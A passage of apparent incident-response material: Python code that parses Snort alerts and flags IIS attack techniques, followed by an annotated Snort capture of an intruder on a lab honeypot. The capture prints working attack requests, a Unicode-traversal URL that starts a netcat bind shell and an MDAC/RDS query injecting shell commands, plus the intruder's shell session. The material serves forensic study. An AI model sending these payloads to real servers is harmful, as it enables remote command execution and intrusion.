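GET /msadc/....../....../..%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe?/c+nc+-l+-p+6969+-e+cmd1.exe HTTP/1.1..Host: lab.wiretrip.net....
=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:43:52.580779 213.116.251.162:1891 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:12037 IpLen:20 DgmLen:831 DF
***AP*** Seq: 0x9F3A4F1C Ack: 0x2CBF9EC4 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-Agent: ACTIVEDATA..Host: lab.wiretrip.net....S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .p.d.u.m.p...e.x.e.".).|.'.
=+=+=+=+=+=+=+=+
"""


@dataclass
class Alert:
    name: str      # Snort rule name from the [**] ... [**] header
    ts: str
    src: str
    dst: str
    payload: str   # Snort's printable dump; '.' stands in for non-printables


def widened(word: str) -> str:
    """Regex for WORD as Snort prints UTF-16LE text: each char, then '.' for the NUL byte."""
    return "".join(re.escape(c) + r"\." for c in word)


HEADER_RE = re.compile(r"^\[\*\*\] (?P<name>.+?) \[\*\*\]$")
PKT_RE = re.compile(r"^(?P<ts>\S+) (?P<src>[\d.]+):\d+ -> (?P<dst>[\d.]+):\d+$")
UNICODE_TRAVERSAL = re.compile(r"\.\.%c0%af|\.\.%c1%9c|\.\.%af\.\.", re.I)  # overlong '/' and '\'
CMD_QUERY = re.compile(r"cmd\w*\.exe\?/c\+(?P<cmd>\S+)", re.I)   # command passed via the URL
NC_LISTENER = re.compile(r"^nc\b.*\s-l\b.*\s-p\s+(\d+)\b.*\s-e\s")  # decoded 'nc -l -p N -e ...'
ECHO_APPEND = re.compile(r"^echo (?P<text>.*?)\s*>>\s*(?P<file>\S+)$")  # decoded 'echo X >>file'
RDS_SHELL = re.compile(widened("|shell("), re.I)                  # RDS body, UTF-16LE as printed


def parse_alerts(text: str) -> List[Alert]:
    """Split a Snort alert dump into records; payload lines after the TCP flags
    line are re-joined with nothing between them, undoing the 64-column wrap."""
    out: List[Alert] = []
    for block in re.split(r"^=\+=\+.*$", text, flags=re.M):
        lines = [ln for ln in block.splitlines() if ln.strip()]
        h = HEADER_RE.match(lines[0]) if lines else None
        p = PKT_RE.match(lines[1]) if len(lines) > 4 else None
        if h and p:
            out.append(Alert(h["name"], p["ts"], p["src"], p["dst"], "".join(lines[4:])))
    return out


def injected_command(a: Alert) -> str:
    """URL-decoded command that followed cmd*.exe?/c+ in the request, or ''."""
    m = CMD_QUERY.search(a.payload)
    return unquote_plus(m["cmd"]) if m else ""


def classify(a: Alert) -> List[str]:
    """Tag one alert with the techniques its payload shows (assumed tag names)."""
    tags: List[str] = []
    if UNICODE_TRAVERSAL.search(a.payload):
        tags.append("iis-unicode-traversal")
    cmd = injected_command(a)
    if cmd:
        tags.append("cmd-exec-via-url")
    m = NC_LISTENER.match(cmd)
    if m:
        tags.append(f"bind-shell-listener:{m.group(1)}")
    if "AdvancedDataFactory.Query" in a.payload and RDS_SHELL.search(a.payload):
        tags.append("rds-msadc-shell")
    return tags


def reconstruct_echo_files(alerts: List[Alert]) -> Dict[str, List[str]]:
    """Rebuild files written one line at a time with 'echo ... >>file' (here the
    FTP script 'ftpcom'), in capture order, so the responder sees what ran."""
    files: Dict[str, List[str]] = {}
    for a in alerts:
        m = ECHO_APPEND.match(injected_command(a))
        if m:
            files.setdefault(m["file"], []).append(m["text"])
    return files


def listener_ports(alerts: List[Alert]) -> List[int]:
    """Ports a bind shell was told to listen on: what to check for on the host."""
    return sorted({int(t.split(":")[1]) for a in alerts for t in classify(a)
                   if t.startswith("bind-shell-listener:")})
```

Run against a full alert file, `reconstruct_echo_files` gives the complete FTP script the earlier `echo` requests assembled, and `listener_ports` gives the port to look for in `netstat` output on the compromised host; the outbound `502 Gateway Error` responses seen after each of these requests are the web server's reaction to a command that ran but returned no HTTP headers, so they are worth correlating rather than dismissing.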
!@# Uses remote shell to get a dir listing but yay.txt is not there.
[**] netcat session 6969 [**]
02/04-05:43:56.131774 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:38009 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBEA994 Ack: 0x9E43FB23 Win: 0x222E TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\Program Files\Common Files\system\
msadc....02/04/01 06:41a ...02/04/01 06:
41a
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:43:56.681806 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:38265 IpLen:20 DgmLen:959 DF
***AP*** Seq: 0x2CBEAA5C Ack: 0x9E43FB23 Win: 0x222E TcpLen: 20
....09/25/97 07:41a 596 adc
javas.inc..09/25/97 07:41a 589 adcvbs.inc..04
/30/97 11:00p 208,144 cmd1.exe..02/04/01 06:41a
98 ftpcom..09/25/97 08:28a 172
,816 msadce.dll..09/25/97 08:16a 5,632 msadcer.
dll..09/25/97 08:24a 23,312 msadcf.dll..09/25/97
08:24a 91,408 msadco.dll..09/25/97 08:19a
5,120 msadcor.dll..09/26/97 08:19a 4
2,256 msadcs.dll..02/04/01 06:41a 59,392 nc.exe.
.02/04/01 06:41a 32,768 pdump.exe..10/02/97 07:
28a 19,388 readme.txt..02/04/01 06:41a
36,864 samdump.dll.. 16 File(s) 698,38
3 bytes.. 1,690,861,056 bytes free....C
:\Program Files\Common Files\system\msadc>..C:\Program Files\Com
mon Files\system\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:44:03.242174 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:39289 IpLen:20 DgmLen:241 DF
***AP*** Seq: 0x2CBEADF3 Ack: 0x9E43FB2B Win: 0x2226 TcpLen: 20
.[Adir..The name specified is not recognized as an..internal or
external command, operable program or batch file.....C:\Program
Files\Common Files\system\msadc>..C:\Program Files\Common Files\
system\ms
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:44:03.806627 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:39545 IpLen:20 DgmLen:44 DF
***AP*** Seq: 0x2CBEAEBC Ack: 0x9E43FB2B Win: 0x2226 TcpLen: 20
adc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:44:05.245136 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:40057 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBEAEC0 Ack: 0x9E43FB30 Win: 0x2221 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\Program Files\Common Files\system\
msadc....02/04/01 06:41a ...02/04/01 06:
41a
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Tries dir again, yay.txt still not there.
[**] netcat session 6969 [**]
02/04-05:44:05.810066 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:40313 IpLen:20 DgmLen:959 DF
***AP*** Seq: 0x2CBEAF88 Ack: 0x9E43FB30 Win: 0x2221 TcpLen: 20
....09/25/97 07:41a 596 adc
javas.inc..09/25/97 07:41a 589 adcvbs.inc..04
/30/97 11:00p 208,144 cmd1.exe..02/04/01 06:41a
98 ftpcom..09/25/97 08:28a 172
,816 msadce.dll..09/25/97 08:16a 5,632 msadcer.
dll..09/25/97 08:24a 23,312 msadcf.dll..09/25/97
08:24a 91,408 msadco.dll..09/25/97 08:19a
5,120 msadcor.dll..09/26/97 08:19a 4
2,256 msadcs.dll..02/04/01 06:41a 59,392 nc.exe.
.02/04/01 06:41a 32,768 pdump.exe..10/02/97 07:
28a 19,388 readme.txt..02/04/01 06:41a
36,864 samdump.dll.. 16 File(s) 698,38
3 bytes.. 1,690,861,056 bytes free....C
:\Program Files\Common Files\system\msadc>..C:\Program Files\Com
mon Files\system\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Deletes the FTP script 'ftpcom' using the remote shell. Cleanup.
[**] netcat session 6969 [**]
02/04-05:44:10.752997 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:41593 IpLen:20 DgmLen:142 DF
***AP*** Seq: 0x2CBEB31F Ack: 0x9E43FB3C Win: 0x2215 TcpLen: 20
del ftpcom....C:\Program Files\Common Files\system\msadc>..C:\Pr
ogram Files\Common Files\system\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Tries to run 'ls' from the remote shell. Sorry, this is NT.
[**] netcat session 6969 [**]
02/04-05:44:13.557283 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:42617 IpLen:20 DgmLen:241 DF
***AP*** Seq: 0x2CBEB385 Ack: 0x9E43FB43 Win: 0x220E TcpLen: 20
ls...The name specified is not recognized as an..internal or ext
ernal command, operable program or batch file.....C:\Program Fil
es\Common Files\system\msadc>..C:\Program Files\Common Files\sys
tem\msadc
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:44:13.908806 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:42873 IpLen:20 DgmLen:41 DF
***AP*** Seq: 0x2CBEB44E Ack: 0x9E43FB46 Win: 0x220B TcpLen: 20
>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Runs dir from remote shell. ftpcom is gone.
[**] netcat session 6969 [**]
02/04-05:44:14.406569 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:43129 IpLen:20 DgmLen:1112 DF
***AP*** Seq: 0x2CBEB44F Ack: 0x9E43FB46 Win: 0x220B TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\Program Files\Common Files\system\
msadc....02/04/01 06:43a ...02/04/01 06:
43a ....09/25/97 07:41a
596 adcjavas.inc..09/25/97 07:41a 589 adcvbs
.inc..04/30/97 11:00p 208,144 cmd1.exe..09/25/97
08:28a 172,816 msadce.dll..09/25/97 08:16a
5,632 msadcer.dll..09/25/97 08:24a 23
,312 msadcf.dll..09/25/97 08:24a 91,408 msadco.d
ll..09/25/97 08:19a 5,120 msadcor.dll..09/26/97
08:19a 42,256 msadcs.dll..02/04/01 06:41a
59,392 nc.exe..02/04/01 06:41a 32,768
pdump.exe..10/02/97 07:28a 19,388 readme.txt..0
2/04/01 06:41a 36,864 samdump.dll..
15 File(s) 698,285 bytes.. 1,69
0,861,056 bytes free....C:\Program Files\Common Files\system\msa
dc>..C:\Program Files\Common Files\system\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Tries to read 'readme.txt' file using 'type' command from his remote shell. Mistypes filename and doesn't try again.
[**] netcat session 6969 [**]
02/04-05:44:20.267054 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:45689 IpLen:20 DgmLen:189 DF
***AP*** Seq: 0x2CBEB87F Ack: 0x9E43FB55 Win: 0x21FC TcpLen: 20
type readme.e..The system cannot find the file specified.....C:\
Program Files\Common Files\system\msadc>..C:\Program Files\Commo
n Files\system\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to run pdump again and redirect output to file 'c:\yay.txt'
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:44:36.999012 213.116.251.162:1893 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:12085 IpLen:20 DgmLen:839 DF
***AP*** Seq: 0x9FE5422E Ack: 0x2CC04C74 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 645..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 436..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .C
.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.o.m.m.o.n. .F.i.l.e.s.\.s.y.s
.t.e.m.\.m.s.a.d.c.\.p.d.u.m.p...e.x.e. .>.>. .c.:.\.y.a.y...t.x
.t.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s
. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e
.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b
.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:44:42.700098 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:49529 IpLen:20 DgmLen:203 DF
***AP*** Seq: 0x2CBEB914 Ack: 0x9E43FB5A Win: 0x21F7 TcpLen: 20
c:...The filename, directory name, or volume label syntax is inc
orrect.....C:\Program Files\Common Files\system\msadc>..C:\Progr
am Files\Common Files\system\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:44:43.701287 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:50297 IpLen:20 DgmLen:57 DF
***AP*** Seq: 0x2CBEB9B7 Ack: 0x9E43FB5F Win: 0x21F2 TcpLen: 20
cd\....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:44:44.602862 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:50809 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBEB9C8 Ack: 0x9E43FB64 Win: 0x21ED TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\....11/26/00 12:34p
0 AUTOEXEC.BAT..11/26/00 06:57p 322 bo
ot.ini..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# From remote shell: CDs to 'c:\' and lists files. There is yay.txt
[**] netcat session 6969 [**]
02/04-05:44:45.158335 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:51065 IpLen:20 DgmLen:746 DF
***AP*** Seq: 0x2CBEBA90 Ack: 0x9E43FB64 Win: 0x21ED TcpLen: 20
11/26/00 12:34p 0 CONFIG.SYS..12/26/00 07:
36p exploits..02/04/01 06:26a
7 fun..12/07/00 03:30p InetPub..
12/07/00 03:12p Multimedia Files..12/26/0
0 07:10p New Folder..01/26/01 02:10p
78,643,200 pagefile.sys..12/21/00 08:59p
Program Files..12/21/00 08:59p TE
MP..02/04/01 06:42a WINNT..12/26/00 07:0
9p wiretrip..02/04/01 06:43a
0 yay.txt.. 14 File(s) 78,643,529 bytes
.. 1,690,861,056 bytes free....C:\>..C:
\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Tries another *nix command from remote shell. Uses 'rm' instead of 'del'
[**] netcat session 6969 [**]
02/04-05:44:51.365858 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:52601 IpLen:20 DgmLen:166 DF
***AP*** Seq: 0x2CBEBD52 Ack: 0x9E43FB6B Win: 0x21E6 TcpLen: 20
rm ....The name specified is not recognized as an..internal or e
xternal command, operable program or batch file.....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# More cleanup, deletes file 'fun' using remote shell
[**] netcat session 6969 [**]
02/04-05:44:54.366817 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:53881 IpLen:20 DgmLen:61 DF
***AP*** Seq: 0x2CBEBDD0 Ack: 0x9E43FB74 Win: 0x21DD TcpLen: 20
del fun....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:44:55.271762 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:54393 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBEBDE5 Ack: 0x9E43FB79 Win: 0x21D8 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\....11/26/00 12:34p
0 AUTOEXEC.BAT..11/26/00 06:57p 322 bo
ot.ini..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:44:55.756325 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:54649 IpLen:20 DgmLen:702 DF
***AP*** Seq: 0x2CBEBEAD Ack: 0x9E43FB79 Win: 0x21D8 TcpLen: 20
11/26/00 12:34p 0 CONFIG.SYS..12/26/00 07:
36p exploits..12/07/00 03:30p InetPub..12/07/00 03:12p Multi
media Files..12/26/00 07:10p New Folder..
01/26/01 02:10p 78,643,200 pagefile.sys..12/21/00 0
8:59p Program Files..12/21/00 08:59p
TEMP..02/04/01 06:42a W
INNT..12/26/00 07:09p wiretrip..02/04/01
06:43a 0 yay.txt.. 13 File(s)
78,643,522 bytes.. 1,690,861,056 by
tes free....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:00.325593 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:56185 IpLen:20 DgmLen:110 DF
***AP*** Seq: 0x2CBEC143 Ack: 0x9E43FB87 Win: 0x21CA TcpLen: 20
cd exploites..The system cannot find the path specified.....C:\>
..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:01.227368 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:56697 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBEC189 Ack: 0x9E43FB8C Win: 0x21C5 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\....11/26/00 12:34p
0 AUTOEXEC.BAT..11/26/00 06:57p 322 bo
ot.ini..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:01.783290 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:56953 IpLen:20 DgmLen:702 DF
***AP*** Seq: 0x2CBEC251 Ack: 0x9E43FB8C Win: 0x21C5 TcpLen: 20
11/26/00 12:34p 0 CONFIG.SYS..12/26/00 07:
36p exploits..12/07/00 03:30p InetPub..12/07/00 03:12p Multi
media Files..12/26/00 07:10p New Folder..
01/26/01 02:10p 78,643,200 pagefile.sys..12/21/00 0
8:59p Program Files..12/21/00 08:59p
TEMP..02/04/01 06:42a W
INNT..12/26/00 07:09p wiretrip..02/04/01
06:43a 0 yay.txt.. 13 File(s)
78,643,522 bytes.. 1,690,861,056 by
tes free....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Exploring... uses the remote shell to 'cd' to the exploits directory
[**] netcat session 6969 [**]
02/04-05:45:03.630418 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:57977 IpLen:20 DgmLen:81 DF
***AP*** Seq: 0x2CBEC4E7 Ack: 0x9E43FB99 Win: 0x21B8 TcpLen: 20
cd exploits....C:\exploits>..C:\exploits>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:04.385185 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:58489 IpLen:20 DgmLen:146 DF
***AP*** Seq: 0x2CBEC510 Ack: 0x9E43FB9E Win: 0x21B3 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\exploits....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:04.884912 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:59001 IpLen:20 DgmLen:396 DF
***AP*** Seq: 0x2CBEC57A Ack: 0x9E43FB9E Win: 0x21B3 TcpLen: 20
12/26/00 07:36p ...12/26/00 07:36p
....12/26/00 07:36p micr
osoft..12/26/00 07:35p newfiles..12/26/00
07:24p unix.. 5 File(s)
0 bytes.. 1,690,861,056 byte
s free....C:\exploits>..C:\exploits>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:10.089824 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:60793 IpLen:20 DgmLen:54 DF
***AP*** Seq: 0x2CBEC6DE Ack: 0x9E43FBAE Win: 0x21A3 TcpLen: 20
cd microsoft..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:10.414143 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:61049 IpLen:20 DgmLen:88 DF
***AP*** Seq: 0x2CBEC6EC Ack: 0x9E43FBB1 Win: 0x21A0 TcpLen: 20
..C:\exploits\microsoft>..C:\exploits\microsoft>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:10.883022 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:61305 IpLen:20 DgmLen:541 DF
***AP*** Seq: 0x2CBEC71C Ack: 0x9E43FBB1 Win: 0x21A0 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\exploits\microsoft....12/26/00 07
:36p ...12/26/00 07:36p
.....11/05/97 09:46a 87,312 95sscrk.zip..08
/15/00 02:06p 734 ac.zip..08/12/98 09:46a
9,417 anger.tar.gz.. 5 File(s)
97,463 bytes.. 1,690,861,056 bytes f
ree....C:\exploits\microsoft>..C:\exploits\microsoft>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:22.658346 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:62841 IpLen:20 DgmLen:75 DF
***AP*** Seq: 0x2CBEC911 Ack: 0x9E43FBB8 Win: 0x2199 TcpLen: 20
cd ......C:\exploits>..C:\exploits>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:25.616190 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:64121 IpLen:20 DgmLen:99 DF
***AP*** Seq: 0x2CBEC934 Ack: 0x9E43FBC5 Win: 0x218C TcpLen: 20
cd newfiles....C:\exploits\newfiles>..C:\exploits\newfiles>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:26.417624 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:64633 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBEC96F Ack: 0x9E43FBCA Win: 0x2187 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\exploits\newfiles....12/26/00 07:
35p ...12/26/00 07:35p
....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:26.906565 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:64889 IpLen:20 DgmLen:185 DF
***AP*** Seq: 0x2CBECA37 Ack: 0x9E43FBCA Win: 0x2187 TcpLen: 20
2 File(s) 0 bytes..
1,690,861,056 bytes free....C:\exploits\newfiles>..C:\e
xploits\newfiles>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:29.268152 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:122 IpLen:20 DgmLen:75 DF
***AP*** Seq: 0x2CBECAC8 Ack: 0x9E43FBD1 Win: 0x2180 TcpLen: 20
cd ......C:\exploits>..C:\exploits>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:30.670116 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:890 IpLen:20 DgmLen:87 DF
***AP*** Seq: 0x2CBECAEB Ack: 0x9E43FBDA Win: 0x2177 TcpLen: 20
cd unix....C:\exploits\unix>..C:\exploits\unix>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:31.521418 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:1402 IpLen:20 DgmLen:151 DF
***AP*** Seq: 0x2CBECB1A Ack: 0x9E43FBDF Win: 0x2172 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\exploits\unix....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:32.010521 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:1658 IpLen:20 DgmLen:581 DF
***AP*** Seq: 0x2CBECB89 Ack: 0x9E43FBDF Win: 0x2172 TcpLen: 20
12/26/00 07:24p ...12/26/00 07:24p
....12/26/00 07:25p suno
s-exploits..12/26/00 07:24p tcp-exploits.
.12/26/00 07:24p trojans..12/26/00 07:16
p udp-exploits..12/26/00 07:15p ultrix-exploits..12/26/00 07:15p
xwin-exploits.. 8 File(s) 0 byte
s.. 1,690,861,056 bytes free....C:\expl
oits\unix>..C:\exploits\unix>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
